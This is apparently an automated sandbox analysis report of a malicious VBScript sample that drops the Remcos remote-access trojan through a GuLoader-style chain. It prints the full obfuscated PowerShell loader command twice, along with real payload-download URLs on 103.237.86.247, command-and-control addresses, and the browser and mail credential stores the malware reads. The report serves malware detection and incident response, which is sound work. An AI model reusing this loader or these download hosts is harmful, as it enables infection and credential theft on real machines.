Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens';if (${host}.currentculture) {$fightet++;}function fyrstendmme($aldersforskellens){$breddesekunder=$aldersforskellens.length-$fightet;$energi='substri';$energi+='ng';for( $standsforskellenes=7;$standsforskellenes -lt $breddesekunder;$standsforskellenes+=8){$unblessed+=$aldersforskellens.$energi.invoke( $standsforskellenes, $fightet);}$unblessed;}function illish($phagedaena){ . ($triangularize) ($phagedaena);}$opholdsstuernes=fyrstendmme 'ove,logmp sternostudentzb,throdibasommal,ovangslcopywria rbefol/aphidic5blokskr.overvaa0duarchy genrefo(reser,ewdistrusiosm.regnspacersdcert,fiopassiarwinterjespeckedi nydelignmontr ctanticle medinde1 overcr0elastom.un.erfo0renounc; topot. bia ricwtrimninijetsrunnlsdelfl6hovmodi4forrykk;nautica stra hsxsne ker6cohea.t4 theop.; prster selvcerentase v undres:undecor1fejlber2phyllos1martial.konkurr0fdevand)yawlers abiologfemkronevejrm.lckommandkbemyndio ti skr/vaaben.2 relati0 fanwr 1flugtni0gerning0analyse1udmanvr0sidetal1lin.les appo,ehfcyk lbaisamekhurcalioloemoa lesfrester o,estselxudsp ng/ aandev1 asiali2tubercl1,eperso. 
drydde0 fogf,u ';$sorteringens=fyrstendmme 'paakrveu antedas sjaelaevulkankr baga e-tjenesta.nderprgmemoryletelak cn ndtjentdesinfi ';$bespake=fyrstendmme 'arthrozh lat,setlaveslat genbrupudnvnel:donnish/telefon/gambesm1esquire0aktiesm3nonrepa. pushie2spag um3 entome7simonio. digame8 cul ee6 mistan. ba oni2sawneba4porella7rodesbl/ clenchf boatsiropprioregraagaamandenklmbetonk,esexol glboghvediaf.rftegadipsybs calceit geodifeulcerog.electroxapp,ehesaf,rydsnholden ';$deutoxide=fyrstendmme 'valgets>bakteri ';$triangularize=fyrstendmme 'udfyldnimikalaseuforkorxreprodu ';$doozie='medansvaret';$bombestoppets = fyrstendmme ' ,ulbrieul,triccungr.sphforretnoafrett. pa.gene%becifreainex,repruelsenpcostaladcarabaoaalk,nettpja,tesafleshbr%tidtag.\ nonmitdsystemko lnra,mbekstraibscragglebudgettlparadeftcraniomrsrsynetuthiokoldclericiesecondin do torshamalds1avgusta4hildebo0a bejds.hugtandaskoleinfunreal.fserpent trillin&hilsene&b ngtow p.cocureinterfrctubi,olhartiumsoc onebr .ustulatunmetap ';illish (fyrstendmme ' pixm.p$gastroegtypot kl etreado trachob pse.doa hrynidl la.dsd:forsnkndmimicaleandalusb mirska,osmolat halefiestandtirdidrach= nati.n(genaabnc derre.msteer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens';if (${host}.currentculture) {$fightet++;}function fyrstendmme($aldersforskellens){$breddesekunder=$aldersforskellens.length-$fightet;$energi='substri';$energi+='ng';for( $standsforskellenes=7;$standsforskellenes -lt $breddesekunder;$standsforskellenes+=8){$unblessed+=$aldersforskellens.$energi.invoke( $standsforskellenes, $fightet);}$unblessed;}function illish($phagedaena){ . ($triangularize) ($phagedaena);}$opholdsstuernes=fyrstendmme 'ove,logmp sternostudentzb,throdibasommal,ovangslcopywria rbefol/aphidic5blokskr.overvaa0duarchy genrefo(reser,ewdistrusiosm.regnspacersdcert,fiopassiarwinterjespeckedi nydelignmontr ctanticle medinde1 overcr0elastom.un.erfo0renounc; topot. bia ricwtrimninijetsrunnlsdelfl6hovmodi4forrykk;nautica stra hsxsne ker6cohea.t4 theop.; prster selvcerentase v undres:undecor1fejlber2phyllos1martial.konkurr0fdevand)yawlers abiologfemkronevejrm.lckommandkbemyndio ti skr/vaaben.2 relati0 fanwr 1flugtni0gerning0analyse1udmanvr0sidetal1lin.les appo,ehfcyk lbaisamekhurcalioloemoa lesfrester o,estselxudsp ng/ aandev1 asiali2tubercl1,eperso. 
drydde0 fogf,u ';$sorteringens=fyrstendmme 'paakrveu antedas sjaelaevulkankr baga e-tjenesta.nderprgmemoryletelak cn ndtjentdesinfi ';$bespake=fyrstendmme 'arthrozh lat,setlaveslat genbrupudnvnel:donnish/telefon/gambesm1esquire0aktiesm3nonrepa. pushie2spag um3 entome7simonio. digame8 cul ee6 mistan. ba oni2sawneba4porella7rodesbl/ clenchf boatsiropprioregraagaamandenklmbetonk,esexol glboghvediaf.rftegadipsybs calceit geodifeulcerog.electroxapp,ehesaf,rydsnholden ';$deutoxide=fyrstendmme 'valgets>bakteri ';$triangularize=fyrstendmme 'udfyldnimikalaseuforkorxreprodu ';$doozie='medansvaret';$bombestoppets = fyrstendmme ' ,ulbrieul,triccungr.sphforretnoafrett. pa.gene%becifreainex,repruelsenpcostaladcarabaoaalk,nettpja,tesafleshbr%tidtag.\ nonmitdsystemko lnra,mbekstraibscragglebudgettlparadeftcraniomrsrsynetuthiokoldclericiesecondin do torshamalds1avgusta4hildebo0a bejds.hugtandaskoleinfunreal.fserpent trillin&hilsene&b ngtow p.cocureinterfrctubi,olhartiumsoc onebr .ustulatunmetap ';illish (fyrstendmme ' pixm.p$gastroegtypot kl etreado trachob pse.doa hrynidl la.dsd:forsnkndmimicaleandalusb mirska,osmolat halefiestandtirdidrach= nati.n(genaabnc derre.msteer
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerneer
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerc
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3372008001.0000000005855000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerb
Source: wab.exe, 0000000A.00000002.3372008001.0000000005855000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerz:
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerneerG
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerK
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr|
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerXX\N
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager7
Source: wab.exe, 0000000A.00000002.3372008001.0000000005855000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerG:
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerQ
Source: wab.exe, 0000000A.00000002.3372008001.0000000005855000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager:x
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager`
Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager(x86)\windows mail\wab.exe
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager=
Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerneeru
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager|
Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.dr | Binary or memory string: [Program Manager]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21362933 cpuid 10_2_21362933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21362264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 10_2_21362264
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 15_2_004082CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0041739B GetVersionExW, 14_2_0041739B
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

Source: Yara match | File source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: ESMTPPassword 15_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 15_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 15_2_00402DB3
Source: Yara match | File source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wab.exe PID: 5008, type: MEMORYSTR

                Remote Access Functionality

Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-SACUXX
Source: Yara match | File source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                221
                Scripting
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                3
                Obfuscated Files or Information
                11
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution
                Logon Script (Windows)212
                Process Injection
                1
                Software Packing
                2
                Credentials in Registry
                2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts212
                Command and Scripting Interpreter
                Login HookLogin Hook1
                DLL Side-Loading
                1
                Credentials In Files
                129
                System Information Discovery
                Distributed Component Object Model11
                Input Capture
                1
                Remote Access Software
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell
                Network Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets141
                Security Software Discovery
                SSH2
                Clipboard Data
                2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                Virtualization/Sandbox Evasion
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture112
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation
                DCSync4
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                Process Injection
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Behavior Graph ID: 1465862 | Sample: SOA.vbs | Start date: 02/07/2024 | Architecture: WINDOWS | Score: 100

Process tree (flattened from the behavior graph):

SOA.vbs (sample)
    DNS/IP: geoplugin.net
    Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Yara detected GuLoader; 10 other signatures
    started: wscript.exe
        Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
        started: powershell.exe
            DNS/IP: 103.237.86.247, ports 49711, 49720, 80, BGNR-AP2BainandCompanySG, unknown
            Signatures: Suspicious powershell command line found; Obfuscated command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
            started: conhost.exe
            started: cmd.exe
            started: powershell.exe
                Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
                started: cmd.exe
                started: wab.exe
                    DNS/IP: 103.237.87.156, ports 1993, 49721, 49722, BGNR-AP2BainandCompanySG, unknown
                    DNS/IP: geoplugin.net 178.237.33.50, ports 49723, 80, ATOM86-ASATOM86NL, Netherlands
                    Dropped file: C:\ProgramData\remcos\logs.dat, data
                    Signatures: Detected Remcos RAT; Maps a DLL or memory area into another process; Installs a global keyboard hook
                    started: conhost.exe
                    started: wab.exe
                        Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
                    started: wab.exe
                        Signatures: Tries to harvest and steal browser information (history, passwords, etc)
                    started: wab.exe

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source | Detection | Scanner | Label | Link
SOA.vbs | 0% | ReversingLabs | |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
geoplugin.net | 1% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
https://contoso.com/License | 0% | URL Reputation | safe |
https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://103.237.86.247 | 0% | Avira URL Cloud | safe |
https://aefd.nelreports.net/api/report?cat=bingth | 0% | Avira URL Cloud | safe |
http://103.237.86.247/Fremmeligste.x | 0% | Avira URL Cloud | safe |
http://103.237.86.247/Fremmeli | 0% | Avira URL Cloud | safe |
http://www.imvu.comr | 0% | Avira URL Cloud | safe |
http://103.237.86.247/Fremmeligste. | 0% | Avira URL Cloud | safe |
http://103.237.86 | 0% | Avira URL Cloud | safe |
https://aefd.nelreports.net/api/report?cat=bingth | 0% | Virustotal | | Browse
http://103.237.86.247 | 0% | Virustotal | | Browse
http://103.237.86.247/Frem | 0% | Avira URL Cloud | safe |
http://www.nirsoft.net | 0% | Avira URL Cloud | safe |
https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | Avira URL Cloud | safe |
https://deff.nelreports.net/api/report?cat=msn | 0% | Avira URL Cloud | safe |
http://103.237.86.247/F | 0% | Avira URL Cloud | safe |
http://103.237.86.247/Fremmeligste.xsnP | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gprv | 0% | Avira URL Cloud | safe |
http://103.237.86.247/Fremmel | 0% | Avira URL Cloud | safe |
http://www.nirsoft.net | 0% | Virustotal | | Browse
https://deff.nelreports.net/api/report?cat=msn | 0% | Virustotal | | Browse
https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | Virustotal | | Browse
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe |
https://www.google.com | 0% | Avira URL Cloud | safe |
http://103.237 | 0% | Avira URL Cloud | safe |
http://103.237.86.247/Fremmeligste | 0% | Avira URL Cloud | safe |
http://103.237. | 0% | Avira URL Cloud | safe |
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL | 0% | Avira URL Cloud | safe |
http://103.237.86.247/Fremmelig | 0% | Avira URL Cloud | safe |
http://103.237.8 | 0% | Avira URL Cloud | safe |
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | 0% | Avira URL Cloud | safe |
https://www.google.com | 0% | Virustotal | | Browse
http://103.237 | 0% | Virustotal | | Browse
http://103.2 | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gpM | 0% | Avira URL Cloud | safe |
http://103.237.86. | 0% | Avira URL Cloud | safe |
https://login.yahoo.com/config/login | 0% | Avira URL Cloud | safe |
http://103.237. | 0% | Virustotal | | Browse
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL | 0% | Virustotal | | Browse
http://www.nirsoft.net/ | 0% | Avira URL Cloud | safe |
http://103.237.86.247/Fremmeligste.xsnXRbl038 | 0% | Avira URL Cloud | safe |
https://login.yahoo.com/config/login | 0% | Virustotal | | Browse
http://103.237H | 0% | Avira URL Cloud | safe |
http://103.2 | 1% | Virustotal | | Browse
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c& | 0% | Avira URL Cloud | safe |
http://103.237.86.247/qOreedem137.bin) | 0% | Avira URL Cloud | safe |
https://www.office.com/ | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gpM | 0% | Virustotal | | Browse
http://geoplugin.net/json.gpa | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gpf | 0% | Avira URL Cloud | safe |
http://103.237.8 | 0% | Virustotal | | Browse
http://www.nirsoft.net/ | 0% | Virustotal | | Browse
http://geoplugin.net/json.gpl | 0% | Avira URL Cloud | safe |
https://www.office.com/ | 0% | Virustotal | | Browse
http://geoplugin.net/json.gpa | 0% | Virustotal | | Browse
http://www.imvu.compData | 0% | Avira URL Cloud | safe |
http://www.imvu.com | 0% | Avira URL Cloud | safe |
https://aefd.nelreports.net/api/report?cat=wsb | 0% | Avira URL Cloud | safe |
http://103.237.86.247/Fremmeligs | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gpf | 0% | Virustotal | | Browse
http://www.imvu.com | 0% | Virustotal | | Browse
http://103.237.86.247/Fremm | 0% | Avira URL Cloud | safe |
103.237.87.156 | 0% | Avira URL Cloud | safe |
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg | 0% | Avira URL Cloud | safe |
http://103.237.86.2 | 0% | Avira URL Cloud | safe |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gpl | 0% | Virustotal | | Browse
http://103.237.86.247/Fremme | 0% | Avira URL Cloud | safe |
http://103.237.86.247/ | 0% | Avira URL Cloud | safe |
http://103.237.86.24 | 0% | Avira URL Cloud | safe |
http://103.237.86.247/Fremmeligste.xs | 0% | Avira URL Cloud | safe |
http://103.237.86.247/Fr | 0% | Avira URL Cloud | safe |
http://103.237.86.247/Fremmeligst | 0% | Avira URL Cloud | safe |
https://aefd.nelreports.net/api/report?cat=bingaot | 0% | Avira URL Cloud | safe |
http://103.237.86.247/qOreedem137.bin | 0% | Avira URL Cloud | safe |
https://aefd.nelreports.net/api/report?cat=bingrms | 0% | Avira URL Cloud | safe |
https://www.google.com/accounts/servicelogin | 0% | Avira URL Cloud | safe |
http://103.23 | 0% | Avira URL Cloud | safe |
http://103.237.86.247/Fremmeligste.xsn | 0% | Avira URL Cloud | safe |
http://103.237.86.247/Fre | 0% | Avira URL Cloud | safe |
http://www.ebuddy.com | 0% | Avira URL Cloud | safe |
                NameIPActiveMaliciousAntivirus DetectionReputation
                geoplugin.net
                178.237.33.50
                truefalseunknown
                NameMaliciousAntivirus DetectionReputation
                103.237.87.156true
                • Avira URL Cloud: safe
                unknown
                http://geoplugin.net/json.gpfalse
                • URL Reputation: safe
                unknown
                http://103.237.86.247/qOreedem137.binfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Fremmeligste.xsnfalse
                • Avira URL Cloud: safe
                unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://103.237.86.247/Fremmeli | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/Fremmeligste.x | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.comr | wab.exe, 0000000A.00000002.3384928445.0000000021330000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingth | bhvEF08.tmp.14.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://103.237.86.247 | powershell.exe, 00000002.00000002.2570518162.000002848CE9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2570518162.000002848E57B000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://103.237.86.247/Fremmeligste. | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86 | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/Frem | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net | wab.exe, 0000000E.00000002.2604949604.0000000002DA4000.00000004.00000010.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingaotak | bhvEF08.tmp.14.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://deff.nelreports.net/api/report?cat=msn | bhvEF08.tmp.14.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
